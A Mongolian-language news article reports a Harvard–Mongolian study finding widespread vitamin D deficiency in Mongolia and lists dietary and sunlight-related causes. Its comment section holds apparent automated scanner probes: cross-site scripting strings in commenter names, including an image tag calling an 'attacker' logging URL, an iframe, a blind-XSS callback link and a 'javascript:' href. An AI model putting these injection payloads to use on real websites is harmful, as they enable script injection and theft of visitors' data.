Монгол хүн Д аминдэмийн гүн дутагдалтай байна.
2015-07-03 11:30:29.0 403
Монгол хүн Д аминдэмийн гүн дутагдалтай байна.

Харвардын Анагаах Ухааны Сургууль болон Харвардын Нийгмийн Эрүүл Мэндийн сургууль, Монгол улсын Анагаахын шинжлэх ухааны их сургуулийн эрдэмтэн судлаачид Монгол хүний хоол хүнсний хэрэглээнд бичил эрдсийн үнэлгээ хийж, цусан дахь Д аминдэмийн хэмжээг тогтоох судалгаа хийсэн байна. 

Уг судалгаагаар монгол хүн нас, хүйс, эрхэлж буй ажил мэргэжил, амьдралын хэв маяг, хэрэглэж буй хоол тэжээлийн онцлогоос үл хамааран Д аминдэмийн гүн дутагдалтай  байгааг тогтоожээ. Тэрээр насанд хүрсэн монгол хүний цусан дахь Д аминдэм өвлийн улиралд 99%, зуны улиралд 38%-ийн дутагдалтай байдаг байна. 

Сургуулийн насны хүүхдүүдэд хийсэн хэд хэдэн судалгааны үр дүнд Д аминдэмийн хэвийн хэмжээ байх ёстой хэвийн хэмжээнээсээ 3 дахин бага буюу амь насанд эрсдэлтэй түвшинд байгаа нь тогтоогдсон байна.

Монгол хүн Д аминдэмийн дутагдалтай байгаа шалтгаан нь:

      1.Хүний бие дэх Д аминдэмийн дийлэнх хэсэг нь арьсанд нарны туяаны нөлөөгөөр үүсдэг. Монголчууд жилд ойролцоогоор 257 үүлгүй өдрийг үздэг. Үүлэн бүрхүүл нь xэт ягаан туяаны тусгалыг 50%-аар бууруулдаг байна. Манайд нарнаас ирж буй Нил ягаан Б туяаны хэмжэ 4,6,7 дугаар саруудад их байдаг бөгөөд зөвхөн эдгээр саруудад нарны туяанаас авах Д аминдэм арьсанд нийлэгждэг юм байна. 

        2.Хоол хүнсээр Д аминдэмийг авч чадахгүй байна.

  • Монголчуудын голлох хоол хүнс нь мах, цагаан идээ, гурилан бүтээгдэхүүн, төмсний байнгын хэрэглээтэй байна. Витамин Д-гийн хоол хүнсний эх үүсвэр нь үхрийн элэг, өндөг (зөвхөн Улаанбаатар хотод олдох боломжтой) байна. 
  • Манайд сүү, сүүн бүтээгдэхүүн /тараг, маргарин/, жүрж болон бусад төрлийн жүүс зэрэг хүнсний бүтээгдэхүүнүүдийг Д аминдэмээр баяжуулдаггүй.
  • Далайн загас, хүнсний нэмэлт бүтээгдэхүүний хэрэглээ маш бага  (жишээ нь мультивитамин) байна. 
  • Архи согтууруулах ундааны хэт их хэрэглээ (Вит Д-гийн бодисын солилцоог бууруулна) 

Тодруулахад: Д аминдэм нь хүүхдийн ясны бэхжилт, өсөлт торнилтод болон төрөлхийн, олдмол дархлаанд чухал үүрэг гүйцэтгэдэг. 

Д амин дэм нь олон төрлийн өвчнөөс урьдчилан сэргийлэх гол суурь болдог ба эрхтний эсийн өсөлтөд нөлөөлж, улмаар хорт хавдар үүсэхээс сэргийлдэг. Энэ амин дэм нь хүний биед кальци болон фосфор гэсэн эрдэс бодис шингэхэд чухал ач холбогдолтой юм.

 

 

Д аминдэмийн дутагдалтай хүмүүсийн цусны даралт ихэнх тохиолдолд харьцангуй өндөр байдгаас тэд зүрх судасны өвчинд илүү өртөмтгий байдаг. 

Тиймээс өөрийн орны нийгэм эдийн засгийн хөгжил, байгаль цаг уур, хоол хүнсний онцлогтой уялдуулан урьдчилан сэргийлэх арга хэмжээг хэрэгжүүлэх шаардлагатай байна.

 

Эх сурвалж: Харвардын Анагаах Ухааны Сургууль болон Харвардын Нийгмийн Эрүүл Мэндийн сургууль, Монгол улсын Анагаахын шинжлэх ухааны их сургуулийн эрдэмтэн судлаачидын хийсэн судалгааны илтгэлээс авлаа.

Мэдээ бичсэн: С.Админ, Мэдээ
Сэтгэгдэл үлдээх
403 Сэтгэгдэл
  • HfjNUlYZ   2022-11-16 19:22:11.0

    e

  • HfjNUlYZ   2022-11-16 19:12:12.0

    e

  • HfjNUlYZ   2022-11-16 19:10:13.0

    e

  • HfjNUlYZ<img sRc='http://attacker-9855/log.php?   2022-11-16 19:09:33.0

    e

  • HfjNUlYZ<awLAnQt<   2022-11-16 19:09:33.0

    e

  • HfjNUlYZ<W5NNKW>ZFHVQ[!+!]</W5NNKW>   2022-11-16 19:09:32.0

    e

  • HfjNUlYZ<ifRAme sRc=9522.com></IfRamE>   2022-11-16 19:09:32.0

    e

  • HfjNUlYZ<acZRFjl x=9985>   2022-11-16 19:09:32.0

    e

  • <a HrEF=http://xss.bxss.me></a>   2022-11-16 19:09:31.0

    e

  • <a HrEF=jaVaScRiPT:>   2022-11-16 19:09:31.0

    e

    Copyrights ©2015: Digital Medic LLC
    `